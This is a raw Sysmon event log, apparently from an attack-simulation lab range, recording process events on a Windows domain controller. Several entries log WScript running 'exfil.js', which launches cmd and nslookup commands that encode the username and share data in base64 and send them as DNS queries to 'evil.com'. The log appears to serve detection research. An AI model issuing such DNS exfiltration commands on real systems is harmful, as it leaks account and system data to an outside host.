14:21:54.023{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-AC46-000000005F02}2928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.023{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-AC46-000000005F02}2928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.007{2E1864BB-1902-629A-AC46-000000005F02}29282900C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-AB46-000000005F02}1400C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.007{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-AC46-000000005F02}2928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.006{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.006{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.006{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.006{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.005{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-AB46-000000005F02}1400C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.005{2E1864BB-18E0-629A-6742-000000005F02}39761044C:\Windows\System32\WScript.exe{2E1864BB-1902-629A-AB46-000000005F02}1400C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.005{2E1864BB-1902-629A-AB46-000000005F02}1400C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldmqhxhe.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.001{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nleukpaw.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044924Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:54.518{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59769B9C503C1BA588BB07AD669C5BBA,SHA256=C6BA2453833BB5F4A5BDF69BBE5EF8BA47BB1C93B1A91ADEA111D19D230F5D44,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.988{2E1864BB-1903-629A-DC46-000000005F02}28202260C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-DD46-000000005F02}1144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.988{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.988{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.988{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.988{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.988{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-DD46-000000005F02}1144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.988{2E1864BB-1903-629A-DB46-000000005F02}38681300C:\Windows\system32\cmd.exe{2E1864BB-1903-629A-DD46-000000005F02}1144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.992{2E1864BB-1903-629A-DD46-000000005F02}1144C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1903-629A-DB46-000000005F02}3868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlezgoh.tmp 2>&1 23542300x8000000000000000216949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.973{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8A32DA42EA3BDFD002496F4593325E7,SHA256=49DAF7E4CA845096087DB9C029481AFA3AB73D33CBA0BEA053723A6C1374E3DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.957{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-DC46-000000005F02}2820C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.957{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-DC46-000000005F02}2820C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.957{2E1864BB-1903-629A-DC46-000000005F02}28202260C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-DB46-000000005F02}3868C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.941{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-DC46-000000005F02}2820C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.941{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.941{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.941{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.941{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.941{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-DB46-000000005F02}3868C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.941{2E1864BB-18E0-629A-6742-000000005F02}3976304C:\Windows\System32\WScript.exe{2E1864BB-1903-629A-DB46-000000005F02}3868C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.941{2E1864BB-1903-629A-DB46-000000005F02}3868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlezgoh.tmp 